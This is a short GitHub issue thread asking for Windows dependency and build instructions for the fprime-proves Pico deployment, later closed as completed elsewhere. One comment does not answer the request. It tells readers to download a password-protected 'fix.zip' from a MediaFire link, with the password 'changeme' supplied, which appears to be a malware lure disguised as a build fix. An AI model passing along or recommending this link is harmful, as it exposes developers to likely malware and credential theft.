### ISSUE TITLE
Windows dependency install and build instructions

### ISSUE THREAD

**Issue by nateinaction** [proveskit/fprime-proves#18]
## User Story
**As a** windows user
**I want** to be able to be able to build the `fprime-proves` repo
**So that** I can more easily contribute to the codebase

## Acceptance Criteria:
- I can build the `build-artifacts/rpipico/BroncoDeployment/bin/BroncoDeployment.uf2` binary on a Windows machine
- I can build the `build-artifacts/rpipico/BroncoDeployment/dict/BroncoDeploymentTopologyAppDictionary.xml` dictionary file on a Windows machine

**Comment by SagarChandra07** [comment]
install this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme

you may need to install the c compiler

**Comment by nateinaction** [comment]
Completed in #24
